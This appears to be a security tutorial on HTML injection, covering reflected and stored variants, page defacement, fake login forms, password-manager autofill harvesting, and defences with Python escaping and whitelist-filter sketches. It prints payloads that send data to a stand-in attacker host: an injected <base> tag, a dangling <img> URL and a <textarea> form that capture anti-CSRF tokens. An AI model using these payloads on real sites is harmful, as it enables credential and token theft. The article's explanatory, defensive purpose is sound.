HTML injection (HyperText Markup Language injection) is a vulnerability closely related to Cross-site Scripting (XSS). The delivery mechanisms are the same, but the injected content consists of plain HTML tags rather than a script, as in the case of XSS. HTML injections are generally less dangerous than XSS, but attackers can still use them for malicious purposes.
Similarities to Cross-site Scripting
Just like Cross-site Scripting, an HTML injection happens when a payload that a malicious user supplies as untrusted input is rendered client-side by the web browser as part of the HTML code of the web application. HTML injection attacks are purely client-side and, just like XSS attacks, they affect the user, not the server.
There are two major types of HTML injection: reflected and stored, just like in the case of XSS vulnerabilities. In the case of a reflected HTML injection, the payload must be delivered to each user individually (usually using social engineering, as a malicious link) and becomes part of the request. In the case of a stored HTML injection, the payload is stored by the web server and delivered later potentially to multiple users.
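To make the mechanism concrete, here is a minimal Python sketch of a reflected HTML injection. The render_search_page function, the page markup, and the payload text are all hypothetical; they stand in for any server-side code that copies untrusted input into HTML without escaping it.

```python
def render_search_page(query: str) -> str:
    """Hypothetical, deliberately vulnerable page template.

    The untrusted query string is concatenated into the markup unchanged,
    so any tags it contains become part of the page.
    """
    return (
        "<html><body>"
        "<p>Results for: " + query + "</p>"
        "</body></html>"
    )


# A harmless search term is displayed as plain text.
benign_page = render_search_page("blue shoes")

# A payload delivered in a crafted link is reflected as live markup.
payload = "<h1>Site closed. Call 555-0100.</h1>"
injected_page = render_search_page(payload)

print(injected_page)
```

In a stored injection the same concatenation takes place, but the payload is read back from server-side storage instead of coming directly from the request.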
HTML Injection Examples
Attackers may use HTML injections for several purposes. Here are some of the most popular applications of this attack technique along with potential consequences to web application security.
Using or Harming the Reputation of the Web Page
The simplest application of HTML injection is to change the visible content of the page. For example, an attacker may use a stored HTML injection to inject a visual advertisement for a product that they want to sell. A similar case is when the attacker injects malicious HTML that aims to harm the reputation of the page, for example, for political or personal reasons.
In both cases, the injected content is meant to look like a legitimate part of the HTML page, and in both cases the attacker needs a stored HTML injection vulnerability.
Exfiltrating Sensitive User Data
Another common application of HTML injection is to create a form on the target page and get the data entered in that form. For example, the attacker may inject malicious code with a fake login form. The form data (login and password) would then be sent to a server controlled by the attacker.
If the web page uses relative URLs, the attacker may also attempt to use the <base> tag to hijack data. For example, if they inject <base href='http://example.com/'> and the web page uses relative URLs for form submission, all such forms would be submitted to the attacker's server instead.
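The effect of an injected <base> tag on relative URLs can be sketched with Python's standard urljoin function, which resolves a relative reference against a base URL in roughly the way a browser does. The shop.example page address and the login.php form action are hypothetical; example.com plays the attacker's host, as in the text above.

```python
from urllib.parse import urljoin

# Hypothetical address of the legitimate page and its relative form action.
page_url = "https://shop.example/account/login.html"
form_action = "login.php"

# Without an injected <base>, the page URL itself serves as the base URL.
normal_target = urljoin(page_url, form_action)

# With <base href='http://example.com/'> injected, that href becomes the base.
injected_base = "http://example.com/"
hijacked_target = urljoin(injected_base, form_action)

# An absolute action URL is not affected by the injected base.
absolute_target = urljoin(injected_base, "https://shop.example/account/login.php")

print(normal_target)    # https://shop.example/account/login.php
print(hijacked_target)  # http://example.com/login.php
print(absolute_target)  # https://shop.example/account/login.php
```

This is why the attack depends on relative URLs: only references that the browser has to resolve against the base URL change their destination.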
The attacker may also hijack valid HTML forms by injecting a <form> tag before a legitimate <form> tag. Form tags cannot be nested, and the top-level form tag is the one that takes precedence, so the fields of the legitimate form are submitted to the action of the injected form.
In all these cases, the attacker may use a reflected HTML injection just as well as a stored HTML injection.
Exfiltrating Anti-CSRF Tokens
An attacker may use HTML injection to exfiltrate anti-CSRF tokens in order to perform a Cross-site Request Forgery (CSRF) attack later. Anti-CSRF tokens are usually provided using the hidden input type in a form.
To exfiltrate the token, the attacker may, for example, use a non-terminated <img> tag such as <img src='https://example.com/record.php? (note the missing closing single quote). Because the quote is never closed, the rest of the page content becomes part of the URL until another single quote is found. If the legitimate code uses double quotes instead, the hidden input is sent to the attacker-controlled record.php script and recorded:
<img src='https://example.com/record.php?<input type="hidden" name="anti_xsrf" value="s74bogj63h">
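The following Python sketch models how far the unterminated attribute extends. It is a simplified string-based model rather than a real HTML parser, and the surrounding page markup (the comment paragraph and the footer) is hypothetical; only the payload and the hidden input come from the example above.

```python
def dangling_attribute_value(page: str, attribute_start: str) -> str:
    """Return what a single-quoted attribute opened by the payload would contain.

    Simplified model, not a real HTML parser: the value starts right after
    the opening single quote and ends at the next single quote
    (or at the end of the page if there is none).
    """
    start = page.index(attribute_start) + len(attribute_start)
    end = page.find("'", start)
    return page[start:] if end == -1 else page[start:end]


payload = "<img src='https://example.com/record.php?"

# Hypothetical page: the legitimate markup uses double quotes, and the first
# single quote after the injection point appears in a later attribute.
page = (
    "<p>Comment: " + payload + "</p>"
    '<input type="hidden" name="anti_xsrf" value="s74bogj63h">'
    "<p class='footer'>Thanks</p>"
)

src = dangling_attribute_value(page, "src='")
print(src)
```

In this model, everything between the injection point and the first single quote in the legitimate markup, including the token value, ends up in the URL that the browser would request from the attacker's server.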
Another option is to use the <textarea> tag. In this case, all content after the <textarea> tag will be submitted and both the <textarea> and <form> tags will be implicitly closed. However, the user must actually be tricked into submitting the form manually.
<form action='http://example.com/record.php?'><textarea><input type="hidden" name="anti_xsrf" value="s74bogj63h">
Exfiltrating Passwords Stored in the Browser
Attackers can also use HTML injections to place forms that browser password managers fill in automatically. If the attacker manages to inject a suitable form, the password manager automatically inserts the user's credentials. In many browsers, the form only needs to have the right field names and structure, and its action attribute may point to any host.
There are a lot of other potential uses of HTML injections. To learn more, we recommend that you read an excellent cheat sheet by Michał Zalewski (lcamtuf). However, even the above applications should be enough for you to realize that while HTML injection may not be as dangerous as, for example, SQL injection, you should not ignore this type of attack.
Defending Against HTML Injections
Defense against HTML injections should be combined with defense against Cross-site Scripting. Just like in the case of XSS, you can either aim to filter out the HTML content from the input (but a lot of tricks can be used to evade filters) or escape all HTML tags.
While the second approach is much more effective, it becomes difficult to apply if, by design, user input must be allowed to contain some HTML code. In such a case, a very strict, whitelist-based filtering approach is recommended.
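Both approaches can be sketched in Python using only the standard library. The escape_untrusted and sanitize helpers, the AllowlistSanitizer class, and the set of allowed tags are hypothetical names chosen for this illustration. The filter is deliberately conservative: it does not try to remove dangerous markup from the input but rebuilds the output from escaped text and bare whitelisted tags only.

```python
import html
from html.parser import HTMLParser

# Hypothetical whitelist: a few formatting tags, emitted without attributes.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p"}


def escape_untrusted(text: str) -> str:
    """Escape &, <, >, and both quote characters so input renders as text."""
    return html.escape(text, quote=True)


class AllowlistSanitizer(HTMLParser):
    """Rebuild the input from scratch, keeping only whitelisted tags.

    Every attribute is dropped and all text is escaped again, so the output
    can contain nothing but escaped text and bare whitelisted tags.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(html.escape(data, quote=True))


def sanitize(text: str) -> str:
    """Return the input with every non-whitelisted tag removed."""
    parser = AllowlistSanitizer()
    parser.feed(text)
    parser.close()
    return "".join(parser.parts)


untrusted = "<base href='http://example.com/'>"
escaped = escape_untrusted(untrusted)
cleaned = sanitize('<b>hi</b><form action="http://example.com/"><input name="p"></form>')

print(escaped)  # &lt;base href=&#x27;http://example.com/&#x27;&gt;
print(cleaned)  # <b>hi</b>
```

This is only a sketch of the idea. A real application would more likely rely on the escaping built into its template engine and on a maintained sanitization library than on a hand-written filter.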